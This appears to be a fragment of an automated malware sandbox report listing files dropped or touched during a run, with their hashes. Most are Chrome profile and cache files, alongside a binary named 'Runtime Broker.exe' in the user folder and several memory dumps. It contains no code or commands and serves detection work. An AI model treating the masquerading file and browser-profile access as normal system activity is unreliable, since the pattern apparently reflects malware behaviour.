| SHA512 | 8d4af4eba3019cd060561f42cff11374eafe59da5e5ad677e41d0b9198b87d6d13706e760d13c70574ed1384993a1597f886d21fe6ecd0186379a1e93db30695 |
memory/536-92-0x00007FFF13890000-0x00007FFF14352000-memory.dmp
memory/536-93-0x00007FFF13893000-0x00007FFF13895000-memory.dmp
memory/3760-94-0x0000020C7C8C0000-0x0000020C7C8CC000-memory.dmp
\??\pipe\crashpad_2152_VYJBYMLHQEQSYWOW
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\Runtime Broker.exe
| MD5 | 0e9ccd796e251916133392539572a374 |
| SHA1 | eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204 |
| SHA256 | c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221 |
| SHA512 | e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d |
memory/1716-156-0x00000297D7CA0000-0x00000297D7CE6000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | cd8205c7ca6020c90ddccf3ad2a9442d |
| SHA1 | 0b041d6cdb2da7e01cb72b46cb3e91119baaf8e7 |
| SHA256 | 5d1b7c2b57411b1e746c978c2e12e7f16bf98c3f4d4ebb9aa2f3ef3c4be3319e |
| SHA512 | 6f40f5541529193c0fee89107b55ff69d31379d8a595fc396808d26449ff13a3ad63cdb3d493cb2bd377d21e676922bc8485f05eaaef719388fba9c9b09fd518 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c071fa3a8a2ef10cf118d421a4550771 |
| SHA1 | 90fb0d7fdf69222b7763fb5b93b865efa63c5ddf |
| SHA256 | 3a8a10cf6d2ba3834bc7cd13517230fb9890978724731cbcb9ba7899294e3491 |
| SHA512 | d1517dce65c50a0b5ee76742af3d04013b30913a65ebb6e1a755210f08a4e03143e5d6173cd335c584677824c0d4198196104088c558d25034f892a429f5cdb3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 96cd4b35550f6b08a462f018141a98c3 |
| SHA1 | 12c0e2a3cc3bb679d2f9e997bd148aeda4a66e34 |
| SHA256 | a29e919fdb81a89eef44c8c515a22eabe58bde1c6d9d0b743d419aeb5908050d |
| SHA512 | d67ab526baaaa5f26bed2874a8ae64fdaf461cecb447663816d955e5375a576004c8690d1a969aed870acc9bf306c0120685ae4d4539ad64057d021c7bc6107d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 43a10b3e1f08da8722aeb4a2306e52fd |
| SHA1 | f2f99d490d391ad2c3d7d2dff6dc3df6f1372444 |
| SHA256 | e1cd3bd4f5e575167eeb853684877d661bb95797c272d5ab8aab755dd8b84905 |
| SHA512 | 0ca97f75d79bac5156a671358802d09a3288bc4ec7d4eadbe5b2154bdfec76367497a81c0c2c2024f5c843372e46cbfcfbedb76d9b84d3c2d9582e565a7df143 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 9ec9007da004d61ca9778a8498af2f7b |
| SHA1 | add118014c9275a88b0717f370c71f500a94a223 |
| SHA256 | 76bed517c101343aa7dfb6b3661c8794cc07140e71f5724def0b9ec61db69383 |
| SHA512 | 0be7976ba8a0a43335aea53e5657fd4987f21b5a33af4851afabfdb7d1a90f8daed37137b021a5bfe7f6c8f5871e38b51cb855320092a3e992e4f8dca7385db1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\d9946227-28f5-4bd2-8d4f-712d5cfca0de.tmp
| MD5 | d810b949d7aa3b10541f274e42a683b6 |
| SHA1 | d161d05ac39e238d8b2d94b2a856d07cc3e132b2 |
| SHA256 | 0f4dcfcd01ae4d5c6ec037a78abc526e15cd602e08c63aa21b9c8ce80b6ade2b |
| SHA512 | cec958076c9864274efe2cc68755d2dc5a7ef094acf9b6e8c2c69981d26bd3fd8f1e0c67719bc8b5f1a2553899149ed6e1c4633951b21ae6f12fe7f97f2fbd14 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 49c3add340f5f7abf75cd982a2b383f6 |
| SHA1 | fd73b9698c8bdc088a56ee27b968fe358b49b7c5 |
| SHA256 | df461d332c63375354c9dee7c58ba0b4e2f46f6e23166ae2e63c8c73ba361257 |
| SHA512 | 4236ffd9d8d2e51cf7e269275612afc4a25bdb6d14bdbc2a5fcb5246065fb1a9fd70eda4649046c25a80a7ca1b975dd98391c93efabd035f3a2d2abced52e01a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\index.txt
| MD5 | 526e75f739ef9bd02ebb77893ccc70b2 |
| SHA1 | a181ec73db03cb823d0f68329cccdda357492513 |
| SHA256 | 0d011987ec9e30b03d6a8cb8b03876090080d8222b2e0c235c8073cf744c3d99 |
| SHA512 | 61854f69c5fe48e9ec8f76be06106d1f2ccc51c93d9bf7f2e4f1a665804b3f63fe2102505b596de5e491a4c088e428296ae51d034026a2ac9f0d841a6119d077 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\index.txt~RFe588c8b.TMP
| MD5 | 9d00f7b3ecd92ae45fe8d0288166971e |
| SHA1 | eace5e94d7ccf65a1c3b8e140152c632d6b2a38a |
| SHA256 | c0e78796b6432e42758e08ceeafd249cd1906b562290b9f5f67db11c8829ccd3 |
| SHA512 | 3664635f2133bb739b4650590b90b62519168388f56aa0d123f60cd1405b6a10d9273dd93afc6beb0e93ef1f1c7043eb0aa184753b40b0a30cf0e3e2419f919f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 027ac85656f3df3a280311f4dcd4d69c |
| SHA1 | a2f0b99fdfc2f3d263769a7f38f18e84678a795c |
| SHA256 | 69292bdf5844176ce1ccb8f4be4733b04ac2600b8bf244b1ec843b3765e3dcac |
| SHA512 | c17fb10b5798e1113912803d429cad90e5691b75cd5fd408eec0b682c0fe8df1e8763c0db17e848659152cef5c7631ff3f19f03ac5c6207d0eaf53d1439e7eeb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe58919c.TMP
| MD5 | 3a453cb951a76d09d8c47c1d9f04fb46 |
| SHA1 | e47e45461466e708a7be8b9b5a9119171d8fe86a |
| SHA256 | 20f479fbd846a0ef94f7f5dea01d6636745edde6cc17321643bdcaae355fccfd |
| SHA512 | 72d96b1c4524bfa2f9f9b66c8aa45c7d599b09361ad37d18b8ad80951ed0c80c89bd121a3e27536efd36ae2cceaa4fb95952a2cf0aecfdbf9a23699f48f5735c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 000cfb695bc437dc83cad7522c8cab3c |
| SHA1 | 5f07163b2f568ddd2d59c5eefbd8a2577dd58f7d |
| SHA256 | b72c78087d6bdccc246f4e8f346bf707b2fc2c63c871892e47e6e0b0d7baf8bd |
| SHA512 | b860a5e2506b7bb25c97b2cb73b885aa27822ec2a1ce213f4e96c2f5d100307b8bbae8bb25f837ce24f51090baee32e4403f18b3f457a78e752de171d9482911 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | f629836f9fb3d4ee82359255d6803147 |
| SHA1 | 879160fc74d49b1d86e323b5c7b1f51da9438e09 |
| SHA256 | 8df25826123d9f35203c3fce43437c9c8bbdbc7b29d3c2c93d44ee9df3922dfd |
| SHA512 | 7b6e469ebd68567d9b2a71189974b67e0e0017dd0474acd3282882d50d8122d4477c82e7f08c038307c7a8c0f87daa2fc890873499bd0a0d97da9c1506ab5a28 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 18abbb34345326f8fde4918d0535d731 |
| SHA1 | 70e0490eff7f87b71baed444f8283989126f16e6 |
| SHA256 | 0b3b5f425f58ce1416958f53a9314c4da978ab26017b1d32c9686d08bfcf256a |
| SHA512 | eb56a349ffb0c3c699d2c7a9a3932a36e3135f5f986dbb6ac43917e96e60825f4a1583e3047b91816506f222fd1a0b76b50f8900a5face9af47552be835e3d47 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | aa3230e0626c4f66ed7a3e58a7dcc97b |
| SHA1 | d3684911f3f82c59e90b8674b9a2dddb2280acbf |
| SHA256 | 3eaea5faa8f318c8febc396aee0e3bf5ac67bd46ab29e7f01e6c1b5aaf0c6b88 |
| SHA512 | 64fc196f4dff1ff3c1bcc01d36d23acfce8c4605596b674039ad34ddc388b5761468e65bc36c6498ed88633a76bf63f25a12a091a39ad3569788c39fd210033f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58da7d.TMP
| MD5 | 7c826602c5a34419f177adf7c03c7238 |
| SHA1 | ebd86c44e06015edfa1aa1ec5f9aa3e87f59f821 |
| SHA256 | 3c79b65e66015d778678f564460997a3a7cdefc5e05f85ad98f7564f845cc448 |
| SHA512 | c301b96b0ea3ec35197d0d8243e67261f760b49fffa60e288a41c4bc30d7ff3105dfd1d87e34917e619ba6440c7747ef4565f65d2a4f89dea0bd62e32cb68972 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\b4aae9a3-2732-4fc5-9e1e-8532126a8478\index-dir\the-real-index
| MD5 | f3c02b851c6abc5bbfa96c8f5fb8579b |
| SHA1 | 2fee0c966a34d205b94f338de579121f1c878d0b |
| SHA256 | 851cb56ab8a23f16b17115aa61904a9c82ebb99470d1b8b2639f93be48ceb98c |
| SHA512 | 491ba5a4ffb2699c114a095976a760c15b18aec1c58b82b5c8ef00fd21da964d156e77f881521ec843fd754fba54d054defca3f8bc1fc205326dd35df1ab87cf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\b4aae9a3-2732-4fc5-9e1e-8532126a8478\index-dir\the-real-index~RFe58daab.TMP
| MD5 | ab5644f7d345836d1787d9808216dd4b |
| SHA1 | fe3e611763cf0fb2d3c2d13a4f19c9d8a00a7caf |
| SHA256 | fe4d59027424f998dfda8bbb4a748c14c40de91be829b5c6b9eb70dab4f0ddca |
| SHA512 | c094a741797b03ce6d5bf50475fa486389a2e183b69b12ff800daef23f1124ce2a25a6fd42f8af929644b17e5ab7db107ba90bd04ae61e701cf04a6bf7269bb3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 33082d0c5f535e20f17d106153052870 |
| SHA1 | fc70462159f01e50dc3cbe66e8bcf1d727882671 |
| SHA256 | b181cd4f5818bfcf15c5f731247407a7167f4a7b9e0338e139e9c102e84e8a84 |
| SHA512 | 0b0669678dbe80ab320150a15a8bf5d35857dcdc07e365529d92060d440184c8d85059874149408b08f6b6fb44a949c86ff9906ec5207fb8838a3dea7c5f6c03 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\3c39af4e-388b-4a34-8b08-275686669aa3\index-dir\the-real-index
| MD5 | ebd848dcf6934e855166d2e39a05b219 |
| SHA1 | 9673cbed8c0963f9ab0b02b18b9009356421e805 |
| SHA256 | cb28afb08990b93c8fac58b45ba312f576eee1fe8162db9fd9b8e7923ddf4e8d |
| SHA512 | a9615ea7a1dce33399b848842b314032d346203f20a729c499ddecfb6c70e9b3d0345bd172a207fe242078b6b40e4f76d9307c64895241df8586f3c7af4f24de |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\3c39af4e-388b-4a34-8b08-275686669aa3\index-dir\the-real-index~RFe58dcfd.TMP
| MD5 | 17e94abcb444592b7c29b146ed266225 |
| SHA1 | 1f5714a345986389bb78ddc43d31e16547f247a8 |
| SHA256 | c1398ad501b7865bf431292a046b8f843580a63cc291a84d4f0570ba74df9463 |
| SHA512 | 4a2ecc506f239fb83c0db94106a65adcccb6adffaf0e89576ceb39261dc6da391432eee58542906c3fecfbd79f81fce010d2846a37c83ded928021856f8ec7f0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\index.txt
| MD5 | 91d3addd55d196164f446a2e0a2c4670 |
| SHA1 | beb6cfdb45549b3faad37124afbc6735d28cdbdb |
| SHA256 | 24a16e796ae6c6e0c7b3e84c9adbec8dabb2f087f6a03ca9ae6a366e4d329208 |
| SHA512 | 6b7aad8e0a55e7ec0255cc92c1ab3f17d96ad4985caa29b3139bd95a3d2193632f19ce3e98322a428ffc483bc2eed388b1631dd64ac7270c921bb2366742c8fa |
memory/3760-663-0x0000020C7CB70000-0x0000020C7CBFE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Runtime Broker.exe.log
| MD5 | 627073ee3ca9676911bee35548eff2b8 |
| SHA1 | 4c4b68c65e2cab9864b51167d710aa29ebdcff2e |
| SHA256 | 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c |
| SHA512 | 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 82fa4a888cbdfa7fee6c937009faa09d |
| SHA1 | ccd30a243634b505642e89c60c128acad5cf8ba9 |
| SHA256 | 71eca5c0a2738ec9154045e1b2be6ac19a41f9bcc341a2e3d613f74a2212ea55 |
| SHA512 | 971f6009d1cf3ac33d44cc6521cc490aca9643865ce97517290e52b8dacb14ba615590b57f4ef10ab1659a3897558c5f088e7d5d366c4f0c0e10828c73be214e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 847bc97307c58707a3c38f2b6e1a444d |
| SHA1 | 1f867077a5624bc8a3d44a9f36505fa5f9ea2707 |
| SHA256 | 5d3e83f727bb06c84efc27ba8b844152ed92f35e7377e22ca830e67debcda9c3 |
| SHA512 | e936c5f3332011af9a6cd6183642efd313892b2f6741d412343ad1055a16cf10ad6dff17da57650f5aa7f62e9630c08825bc3a2e6da94ae9330d390293f21dd7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 209353a74c45edb9f25917b640f962f6 |
| SHA1 | 5d9304edfdd7e6576dfaa43615b10c7c0a3ddea9 |
| SHA256 | 318cf5f5e5787d6ae5f4feb4cf1d1e49236086e8e63b6fe314e1e68825b21e78 |
| SHA512 | 01981757ef00ca8a6383b7e5e9fdb6e1038e2725de6f2b23f0feefc048d53858e1e66d8aa19f180cad5d68ab4e6afb8751e44c195e36280772e0e1bfc79fb059 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 376049a960407231a4d4755454e56f89 |
| SHA1 | a76c8ac786093e51a8c3772601b52be563be985f |
| SHA256 | 257fdc20af0236c9eeba61c2647bd950eb26dea400a2d267b50be7d70cf4615c |
| SHA512 | 6bd66b972d4f364891c03791dd5932b85cd9ae850f0ed4708e67183290bb497ae429482acd4977ab79c5ba31d074b577bbb2624ed7c056f4869bf088ad9c0b77 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 5bb333c33ec30cda96e6bd471c8a6145 |
| SHA1 | d0541eda57d733339a2acf4a8b8e12e10d910787 |
| SHA256 | 78d88758aa1f10b91caa59c55669c6fc29fc7bd71aabc212fc49acb750d419c3 |
| SHA512 | 962941b58cf78ea4a31b9dca797e6e302eda88e5c4b04f13b25e6d6a618f1cc62af21c4a0176db5682ac065ed2be925828aae1a7315d9a68b365759367077464 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 865a551095e53d195927e9cc1689ad40 |
| SHA1 | f20c7a70ba70119101d013b816b30c2e525242de |
| SHA256 | 8c1a9e10d82384e3cba34cdc4941ec38ad10fa7cde11def71190415e8bf89b18 |
| SHA512 | 5048b482ec7d939466d83c8f7ca0225edf860ade55a2deb2793f351c0ff084ae251dc78cea843c1667bd6398638bf74953f5226a338503b244c997128e89b901 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | a8bc16aaca1ecc1b68266c0b2d941263 |
| SHA1 | 56ba9a3259253a45af766a20a689f185f0c27311 |
| SHA256 | 1903586a5b3b0a69a603ba8a4d2ce720cc8c4fc226392f4d0c749b45ea7b2504 |
| SHA512 | d976f493d1acff5dc7804afe8a549b9e8f27332c6a6ef945b3783de93f95fd3468ef3895097ac8c6fdb53b4255cb56095a2288a7599139e7445c3e34c901cc43 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | b913fe2cf820a2384b5b74ee09ff45f0 |
| SHA1 | dec8db73a30ae56a1119ce38ce2e2ee9619d219c |
| SHA256 | 419a49d6ea0a65a5e7de19e11a68b69d0a5d744ce14d9470e670b1e479058c16 |
| SHA512 | 0ac194b162e3cd40b231494d3a63af2e41262c7930547b708fb41425300158d441fdb2032f5b3b0b1573709fef1a07fe2eaa7061cf029504e5e7188193447790 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
| MD5 | 0fdbe6432e0b06449631e0b24afeefe1 |
| SHA1 | 6aeb5f2c21cb7d6628ee5cbbe2363133421b461a |
| SHA256 | 5bf032905be200c16b494e72b33bd4878332314a1d820bdabef10105ceccfec7 |
| SHA512 | 3204cfbde48888044cf5c635456d07c7636c8aef1c6c742b3a59fca611231ecdb7dddeac7f7b67e090b2230587232ad45018d31d3df7311819d91b544f7c40d8 |